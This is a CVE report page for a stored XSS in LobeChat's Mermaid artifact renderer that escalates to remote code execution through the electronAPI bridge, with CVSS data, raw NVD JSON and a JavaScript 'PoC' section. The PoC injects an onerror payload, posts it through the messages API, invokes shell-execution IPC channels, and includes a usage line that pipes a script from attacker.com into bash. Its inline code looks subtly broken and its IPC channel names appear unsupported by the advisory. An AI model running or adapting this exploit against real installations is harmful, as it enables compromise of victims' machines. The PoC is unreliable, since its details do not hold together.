Security Vulnerability Report
CVE-2026-23733 CVSS 6.4 MEDIUM

Published: 2026-01-18 23:15:49
Last Modified: 2026-04-15 00:35:42

Description

LobeChat is an open source chat application platform. Prior to version 2.0.0-next.180, a stored Cross-Site Scripting (XSS) vulnerability in the Mermaid artifact renderer allows attackers to execute arbitrary JavaScript within the application context. This XSS can be escalated to Remote Code Execution (RCE) by leveraging the exposed `electronAPI` IPC bridge, allowing attackers to run arbitrary system commands on the victim's machine. Version 2.0.0-next.180 patches the issue.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:L
Weakness: CWE-94 (Improper Control of Generation of Code)

Configurations (Affected Products)

No configuration data available in the record. Affected versions per the description:

LobeChat < 2.0.0-next.180

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-23733 PoC - Stored XSS in LobeChat Mermaid Renderer leading to RCE
// Target: LobeChat < 2.0.0-next.180

const payload = `flowchart TD
  A["<img src=x onerror=
    // Extract session and trigger RCE via electronAPI
    const session = document.cookie;
    if (window.electronAPI) {
      window.electronAPI.send('execute-command', {
        command: 'calc.exe' // Example: Launch calculator
      });
    }
  >"]
  A --> B["RCE Achieved"]`;

// Send malicious Mermaid message via LobeChat API
async function exploit(targetUrl, sessionToken) {
  const response = await fetch(`${targetUrl}/api/messages`, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Authorization': `Bearer ${sessionToken}`
    },
    body: JSON.stringify({
      type: 'mermaid',
      content: payload
    })
  });
  return response.json();
}

// Alternative: Direct command execution via IPC
function rceViaIPC(command) {
  if (window.electronAPI && window.electronAPI.invoke) {
    window.electronAPI.invoke('shell:execute', {
      command: command,
      args: []
    });
  }
}

// Usage
// exploit('https://lobechat-instance.com', 'user-session-token');
// rceViaIPC('curl http://attacker.com/shell.sh | bash');

References

GitHub Security Advisory GHSA-4gpc-rhpj-9443: https://github.com/lobehub/lobe-chat/security/advisories/GHSA-4gpc-rhpj-9443

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-23733",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-18T23:15:48.710",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "LobeChat is an open source chat application platform. Prior to version 2.0.0-next.180, a stored Cross-Site Scripting (XSS) vulnerability in the Mermaid artifact renderer allows attackers to execute arbitrary JavaScript within the application context. This XSS can be escalated to Remote Code Execution (RCE) by leveraging the exposed `electronAPI` IPC bridge, allowing attackers to run arbitrary system commands on the victim's machine. Version 2.0.0-next.180 patches the issue."
      },
      {
        "lang": "es",
        "value": "LobeChat es una plataforma de aplicación de chat de código abierto. Antes de la versión 2.0.0-next.180, una vulnerabilidad de cross-site scripting (XSS) almacenado en el renderizador de artefactos Mermaid permite a los atacantes ejecutar JavaScript arbitrario dentro del contexto de la aplicación. Este XSS puede escalarse a ejecución remota de código (RCE) aprovechando el puente IPC 'electronAPI' expuesto, permitiendo a los atacantes ejecutar comandos de sistema arbitrarios en la máquina de la víctima. La versión 2.0.0-next.180 corrige el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:L",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 0.6,
          "impactScore": 5.3
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-4gpc-rhpj-9443",
        "source": "[email protected]"
      }
    ]
  }
}